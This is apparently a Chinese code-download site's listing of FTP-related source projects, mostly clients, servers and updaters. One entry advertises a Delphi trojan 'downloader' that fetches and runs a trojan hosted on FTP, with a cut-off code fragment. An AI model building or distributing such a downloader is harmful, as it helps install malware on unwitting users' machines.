搜索资源列表
-
0下载:
UPDDEMO,展示了用WinInet FTP函数在第二个线程执行期间从匿名FTP服务器上下载文件的方法。-UPDDEMO. using WinInet display FTP function in the second threads implementation period from anonymous FTP server download methods.
-
-
0下载:
执行后可以下载指定程序并执行
你先把大体积木马放到一固定FTP空间上
打开Delphi 打开down.dpr,看到了吧 改一下编译 ok 个人版下载者:)
用工具压一下,只有10K
这样说完是不行的,说一下代码:
program wsdgsRoad
uses
URLMon,
ShellApi
var
u,l: pchar
{.$R *.res}
function DownloadF
-
-
0下载:
利用进程通信套接字socket 的编程接口功能,设计和实现了一个简单的文件传输协议。此为FTP服务器端。-communications process using socket programming interface functions, Design and Implementation of a simple file transfer protocol. To this FTP server.
-
-
0下载:
“软件在线升级系统”执行说明: 1、 光盘目录vc6.0\\chapter6\\bin\\UpgradeAtv.dll为本系统的可执行文件。在测试之前要先使用regsvr32.exe注册这个DLL。 2、 光盘目录vc6.0\\chapter6\\Pages是本系统的测试页面。 3、 光盘目录vc6.0\\chapter6\\setup是系统安装指导。 4、 光盘目录vc6.0\\chapter6\\src\\UpgradeAtv\\*.*为本系统的VC源程序。 5、 光盘目录vc6.0\\ch
-
-
0下载:
实现一个Ftp搜索工具,主要介绍了属性页控件,对指定IP执行Ping命令查看主机存活状态,扫描主机端口,打开、添加、查询和关闭数据库,IP地址控件的使用等。-achieving a search tool, mainly on the properties page controls, the implementation of a designated IP Ping order to survive View host state, scanning host ports, open, ad
-
-
0下载:
用C及ftp实现软件自动升级。通过在服务器端建立FTP服务,实现远程主机的文件更新. 软件启动过程连接服务器,获得软件文件更新列表(此步省略),进行本地文件更新 启动过程进行系统调用执行批处理文件ftpget.bat,调用方式system( \"e:\\\\ftpget.bat\" ) 文件ftpget.bat负责连接服务器下载所需文件,并完成文件的更新-C ftp software and automatic upgrades. Through the establis
-
-
0下载:
ftp 源码,包括服务端和客户端,在window上实现-ftp source code, including server and client, in the window on the implementation
-
-
0下载:
The proxy project is an implementation of an HTTP, FTP and SOCKS proxy server and PortMap server.
-
-
0下载:
用Csharp实现的FTP代码,具体说明请见代码-FTP implementation with Csharp code, see the code to specify
-
-
0下载:
winsock实现ftp服务器
基于标准的FPT协议,tcp/ip协议-winsock implementation ftp server
-
-
0下载:
解析ftp协议。实现功能。我觉得很好。网络作业非常实用啊。-Resolution ftp protocol. Implementation features. I feel very good. Operation of the network is very useful ah.
-
-
0下载:
用WinSock实现文件上传,不用控件,使用WinSock.PB11.5下测试成功。-File upload using WinSock implementation, not control, use WinSock.PB11.5 successfully tested.
-
-
0下载:
FTP client端,包括双向,传输速度,主动被动,bit/字节等模式。C语言。-The FTP client, including bi-directional transmission speed, active and passive, bit/byte modes. C language.
-
-
0下载:
实现FTP的实例。实 现FTP的实例。-Implementation examples of FTP. Implementation examples of FTP. Implementation examples of FTP.
-
-
0下载:
ftp工具 mfc实现源码(学习使用的简单版本)-The FTP tool to achieve MFC source code (simple version of learning to use)
The FTP tool to achieve MFC source code (simple version of learning to use)
-
-
0下载:
c语言来模拟FTP服务器与客户端的实现,实现客户端与FTP服务器通信。(C language to simulate the implementation of FTP server and client, to achieve client and FTP server communication.)
-
-
0下载:
FTP协议的简单实现,从客户端可以获得服务器端指定的文件夹信息(FTP protocol simple implementation, from the client can get the server specified folder information)
-
-
0下载:
使用QT5 实现的FTP工具,里面还有tcp通信。实现的功能是局域网文件传输,可自定义传输控制协议(Using QT5 implementation of the FTP tool, there are TCP communications. The realization of the function is LAN file transfer, you can customize the transmission control protocol)
-
-
0下载:
VC使用C/C++实现FTP上传、下载功能(VC implementation of the FTP function)
-
-
1下载:
简单Ftp客户端的实现
在WINDOWS环境下,使用VC++开发工具开发的一个FTP客户端软件。(Simple Ftp client implementation
In the WINDOWS environment, an FTP client software developed using VC++ development tools.)
-